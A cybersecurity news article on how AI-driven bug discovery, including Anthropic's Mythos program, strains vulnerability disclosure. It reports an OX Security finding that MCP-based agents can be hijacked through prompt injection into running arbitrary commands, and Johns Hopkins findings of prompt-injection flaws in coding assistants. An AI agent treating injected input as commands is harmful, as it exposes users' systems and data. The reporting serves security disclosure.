AI systems designed to discover software flaws at scale are beginning to outpace the classification and disclosure of vulnerabilities. New research and early data from the Mythos program have highlighted gaps in how findings are reported, attributed, and tracked.

Key takeaways:

OX Security found that serious flaws in AI frameworks like Anthropic’s MCP are often dismissed as “expected behavior,” even when they enable major risks like remote code execution.
John Hopkins research shows AI tools are finding bugs faster than humans can verify them, with companies sometimes acknowledging issues privately (and paying bounties) without public disclosure.
Early Mythos data and CVE analysis suggest many AI-discovered vulnerabilities aren’t being formally tracked, highlighting gaps in disclosure systems and calls for dedicated reporting channels.

As Anthropic promotes its Mythos model as capable of autonomously discovering software vulnerabilities at scale – and OpenAI is reported to be developing similar systems – new research suggests the challenge may not be finding flaws but handling them once they are identified.

Don't miss our latest stories on Google News

Add us as your Preferred Source on Google.

Three reports published this week (two of which were undertaken before the Mythos announcement) point to the growing gap between AI-driven bug hunting and how this growing slew of flaws is reported.

Anthropic’s MCP agent framework: Flaw or expected behavior?

An OX Security report focuses on Anthropic’s Model Context Protocol (MCP), a framework that enables AI agents to interact with external tools and services.

Researchers Moshe Ben Siman Tov, Mustafa Naamnih, Nir Zadok and Roni Bar examined Anthropic MCP implementations as well as comparable tool-connection frameworks used elsewhere in the ecosystem.

Anthropic Claude — Ox reported a flaw in Anthropic’s Model Context Protocol, but claims that fell on deaf ears. Image by Cybernews

These included components associated with LangChain, a widely used open-source framework for building AI applications and agents that connect LLMs to APIs and external data sources.

According to the researchers, the core issue is that these frameworks can lead to prompt injection and agent hijacking, meaning that AI tools may treat malicious input as commands.

“The vulnerability is not a one-off coding mistake,” the report notes.

“It is an architectural design decision baked into Anthropic’s MCP code across supported programming languages.”

Check if your data has been leaked

Find out if your email, phone number or related personal information might have fallen into the wrong hands.

18,611,353,922

Breached accounts

36,030

Breached websites

The report describes how prompt injection can escalate into system-level compromise, including remote command execution and access to sensitive data.

OX said it was able to demonstrate arbitrary command execution across six live production platforms serving paying customers (it did not name which ones), suggesting the issue extended beyond lab conditions.

The problem, researchers claim, arose from the reporting of this flaw: when it was disclosed to Anthropic and LangChain, both classified it as “expected behavior.”

The report claims, “Lang chain’s response was: ‘This is expected behavior. Developers are responsible for their own sanitization.”

The distinction between “expected behavior” and a vulnerability is important because it may not enter formal disclosure pipelines such as advisories or CVE reporting.

However, OX argues that when expected behavior leads to remote code execution (RCE), it should be treated as a vulnerability.

OX claims that this is a “widespread problem” around multiple projects that involve connecting user input to MCP configuration.

“We repeatedly tried to convince Anthropic to patch their code in ways that would instantly protect millions of users. They declined each time.”
OX Security

They claim that Anthropic must have known because a week after they contacted the Claude AI maker, it released an updated security policy that stated the use of MCP adapters should be used with caution.

“This change didn’t fix anything – it just made it clearer that Anthropic's stance is on letting developers secure their own code instead of securing their infrastructure.

However, as the researchers point out, developers are not engineers.

"Developers are not security engineers; we cannot expect tens of thousands of implementers to independently discover and mitigate a flaw that is baked into the official SDKs they trust.”
OX Security

The researchers also point out that, as less technically proficient users vibe code, they will simply be unable to mitigate what they describe as a secure-by-design failure.

Johns Hopkins: AI-powered coding is surfacing bugs faster than the reviewers can verify

At the same time, separate research led by researcher Aonan Guan, with academics from Johns Hopkins University, shows a related pressure point: AI tools are finding vulnerabilities quicker than they can review or verify them.

Although this research was published today, it would have predated the release of Mythos. The study of agentic coding assistants found widespread prompt-injection and tool-use weaknesses, while broader reviews concluded that many defenses remain incomplete or inconsistent across platforms.

Hackers trying Claude, Gemini, ChatGPT — New study of agentic coding assistants found widespread instances of prompt-injection and tool-use flaws, but they remain undisclosed despite bounties paid.

Researchers say that means AI may accelerate discovery, but human teams still face the slower task of validation, prioritization, patching, and formal disclosure.

Interestingly, while Anthropic, Github and others did acknowledge the vulnerabilities and paid the bug bounties, they did so quietly and did not disclose the issue. GitHub initially dismissed Guan's research as a known "architectural limitation" before paying him $500 and patting him on the back "Your report sparked some great internal discussions," it added.

Project Glasswing early data: the difficulty of tracking results

Taking an early look at data on Mythos’s own output suggests that even clearly defined vulnerabilities may not be fully reflected in public reporting systems.

Anthropic has made Mythos available through Project Glasswing, a restricted program allowing selected organizations – banks, big tech, and cybersecurity heavyweights – to test the model on their own software.

Anthropic Claude Mythos — A recent review of CVE records to identify vulnerabilities linked to Anthropic’s work found only a limited number of entries that could plausibly be connected to Mythos.

An analysis published in The Register highlights the difficulty of tracking the results. VulnCheck researcher Patrick Garrity reviewed CVE records to identify vulnerabilities linked to Anthropic’s work and found only a limited number of entries that could plausibly be connected to Mythos or Glasswing activity.

Garrity found around 75 CVE records containing references to Anthropic, but many related to Anthropic products such as Claude Code or third-party integrations rather than vulnerabilities discovered by Mythos.

Of the remaining entries credited to Anthropic or affiliated researchers, only one publicly disclosed issue – a remote code execution flaw in FreeBSD – could be directly tied to claims that Anthropic has made about Mythos.

Other public vulnerabilities publicly referenced by Anthropic, including legacy bugs in operating systems and software libraries, had not yet been assigned CVEs at the time of the analysis.

Garrity added “the full picture won’t be known until public disclosure takes place,” and suggested a dedicated advisory channel where Anthropic could consistently publish findings, remediation status, and attribution.

Disclosure pipelines under pressure

IIkka Turunen, field CTO at Sonatype, said Mythos points to a near-term surge in AI-driven vulnerability discovery that existing reporting systems may struggle to absorb. He noted that the US National Vulnerability Database has already changed how it processes submissions, prioritizing software used by the federal government and actively exploiting flaws first – a sign that disclosure pipelines are under growing pressure.

As it stands, the CVE program counts more than 300,000 unique CVE records to date. Of those around 18,000 were reported in 2026 – a growth of more than 25% from the same period in 2025.

“We’re facing a double whammy - new vulnerabilities and poorer discoverability."
Ikka Turunen, field CTO at Sonatype

While these discoveries will not draw as many headlines as the limited release of a super-powerful AI that is considered too dangerous to be released, the question of how the vulnerabilities it surfaces will be categorized, prioritized, and communicated at scale is left hanging in the air like an unresolved flaw – visible to many, but owned by no one.

Unlock more exclusive Cybernews content on YouTube.

“Developers are not engineers:” Why Anthropic’s Mythos and other AI tools expose gaps in vulnerability reporting

More from Cybernews

Anthropic’s MCP agent framework: Flaw or expected behavior?

Check if your data has been leaked

Johns Hopkins: AI-powered coding is surfacing bugs faster than the reviewers can verify

Project Glasswing early data: the difficulty of tracking results

Disclosure pipelines under pressure